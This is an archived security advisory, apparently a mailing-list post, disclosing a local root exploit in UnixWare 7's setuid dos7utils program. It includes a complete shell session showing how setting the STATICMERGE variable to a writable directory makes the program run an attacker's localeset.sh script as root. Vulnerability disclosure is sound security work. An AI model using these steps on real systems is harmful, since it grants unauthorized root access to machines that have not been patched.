Greetings, A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by default) which allows any user to execute any command as root. The dos7utils program gets its localeset.sh exec path from the environment variable STATICMERGE. By setting this to a directory writable by us and setting the -f switch, we can have dos7utils run our program as follows: bash-2.02$ uname -a; id; pwd UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5 uid=101(xnec) gid=1(other) /usr/lib/merge bash-2.02$ export STATICMERGE=/tmp bash-2.02$ cat > /tmp/localeset.sh #!/bin/sh id bash-2.02$ chmod 700 /tmp/localeset.sh bash-2.02$ ./dos7utils -f bah uid=0(root) gid=1(other) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp) bash-2.02$ ---- Searching through the securityfocus vulnerability archives yields 0 matches for search string "unixware", but several for "openserver". I thought this was rather strange, considering that SCO is discontinuing OpenServer after 5.0.5 in favor of the much more reliable (though not security-wise, evidently) UnixWare 7. And so begins my audit of the virgin Unixware 7 so soon after my incomplete audit of SCO 5.0.5. Brock Tellier UNIX Systems Administrator ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:06:44 PDT